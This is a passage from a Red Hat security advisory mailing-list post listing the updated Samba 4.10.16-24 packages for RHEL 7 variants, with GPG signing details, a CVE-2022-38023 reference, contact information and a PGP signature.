samba-devel-4.10.16-24.el7_9.s390x.rpm  
samba-python-4.10.16-24.el7_9.s390.rpm  
samba-python-4.10.16-24.el7_9.s390x.rpm  
samba-python-test-4.10.16-24.el7_9.s390x.rpm  
samba-test-4.10.16-24.el7_9.s390x.rpm  
samba-test-libs-4.10.16-24.el7_9.s390.rpm  
samba-test-libs-4.10.16-24.el7_9.s390x.rpm  
samba-winbind-krb5-locator-4.10.16-24.el7_9.s390x.rpm

x86_64:  
libsmbclient-devel-4.10.16-24.el7_9.i686.rpm  
libsmbclient-devel-4.10.16-24.el7_9.x86_64.rpm  
libwbclient-devel-4.10.16-24.el7_9.i686.rpm  
libwbclient-devel-4.10.16-24.el7_9.x86_64.rpm  
samba-dc-4.10.16-24.el7_9.x86_64.rpm  
samba-dc-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-debuginfo-4.10.16-24.el7_9.i686.rpm  
samba-debuginfo-4.10.16-24.el7_9.x86_64.rpm  
samba-devel-4.10.16-24.el7_9.i686.rpm  
samba-devel-4.10.16-24.el7_9.x86_64.rpm  
samba-python-test-4.10.16-24.el7_9.x86_64.rpm  
samba-test-4.10.16-24.el7_9.x86_64.rpm  
samba-test-libs-4.10.16-24.el7_9.i686.rpm  
samba-test-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-vfs-glusterfs-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-krb5-locator-4.10.16-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
samba-4.10.16-24.el7_9.src.rpm

noarch:  
samba-common-4.10.16-24.el7_9.noarch.rpm

x86_64:  
libsmbclient-4.10.16-24.el7_9.i686.rpm  
libsmbclient-4.10.16-24.el7_9.x86_64.rpm  
libwbclient-4.10.16-24.el7_9.i686.rpm  
libwbclient-4.10.16-24.el7_9.x86_64.rpm  
samba-4.10.16-24.el7_9.x86_64.rpm  
samba-client-4.10.16-24.el7_9.x86_64.rpm  
samba-client-libs-4.10.16-24.el7_9.i686.rpm  
samba-client-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-common-libs-4.10.16-24.el7_9.i686.rpm  
samba-common-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-common-tools-4.10.16-24.el7_9.x86_64.rpm  
samba-debuginfo-4.10.16-24.el7_9.i686.rpm  
samba-debuginfo-4.10.16-24.el7_9.x86_64.rpm  
samba-krb5-printing-4.10.16-24.el7_9.x86_64.rpm  
samba-libs-4.10.16-24.el7_9.i686.rpm  
samba-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-python-4.10.16-24.el7_9.i686.rpm  
samba-python-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-clients-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-modules-4.10.16-24.el7_9.i686.rpm  
samba-winbind-modules-4.10.16-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
samba-pidl-4.10.16-24.el7_9.noarch.rpm

x86_64:  
libsmbclient-devel-4.10.16-24.el7_9.i686.rpm  
libsmbclient-devel-4.10.16-24.el7_9.x86_64.rpm  
libwbclient-devel-4.10.16-24.el7_9.i686.rpm  
libwbclient-devel-4.10.16-24.el7_9.x86_64.rpm  
samba-dc-4.10.16-24.el7_9.x86_64.rpm  
samba-dc-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-debuginfo-4.10.16-24.el7_9.i686.rpm  
samba-debuginfo-4.10.16-24.el7_9.x86_64.rpm  
samba-devel-4.10.16-24.el7_9.i686.rpm  
samba-devel-4.10.16-24.el7_9.x86_64.rpm  
samba-python-test-4.10.16-24.el7_9.x86_64.rpm  
samba-test-4.10.16-24.el7_9.x86_64.rpm  
samba-test-libs-4.10.16-24.el7_9.i686.rpm  
samba-test-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-vfs-glusterfs-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-krb5-locator-4.10.16-24.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38023  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuEtzjgjWX9erEAQhUDw//Qi/qcd3ku8l1Wyj9u1RjzBSaFG5ziUiS  
jMOVFpqpJKXEn0NKQTRlARwkKNlEAOsKj0d+JMWm7g2K3eVl+5QMF0mBDs71aLH0  
huWacphmH+r5zwuBQoqSGRTSFfO1Ue579szk/FeL3bZMe4hfA88OFsPAgiBeqryO  
/97gmKB5vVafJBlCTc0bQPFvICsEDK8yFKWuj6TjAPcGlMVpP8KqrlxRy+fVcAFC  
pHB4oOI87ZRzu9wlE4ZnpnyrWVwTo5fCpwRBlrxV6KpagkMUvcf6zzpJLH5CqKMr  
zJ0SUcyoU/9bFC6iO2+3WLi5JGiF4UHNb19iGJRcB7OOl8uvue8IpOxTVdwXhAys  
tqw3LaII3hEij82A6rB8o6dH8gPSU21vJoxqF8xbzeOATPrDb6ZXPTbsWQKm+CJC  
BAfTlUxw/5qSaKTL/ckqLomicfc0ZQ4tVndk3oveOVzGzek0QGI1sGcP+l/u7jBx  
9lbLR/bdBHynskJ+p2uNwo9qH9Esa0tQ1ljBKhfyB+sERMEA/V5o+YRgBNv1rurN  
Uw41Aste32UQlrTb4HAeEbDkLOKTxdiGmV4QomBGvDLvWO3cG7sapMER5VxDa/Xn  
Undn9vqL07YUqLirbKJ0HIrMmCMFkJPQtpi8N55lxB1X+oafS/AQy/RNVws2OGza  
dAmAptTwZ1I=2JAI  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#mac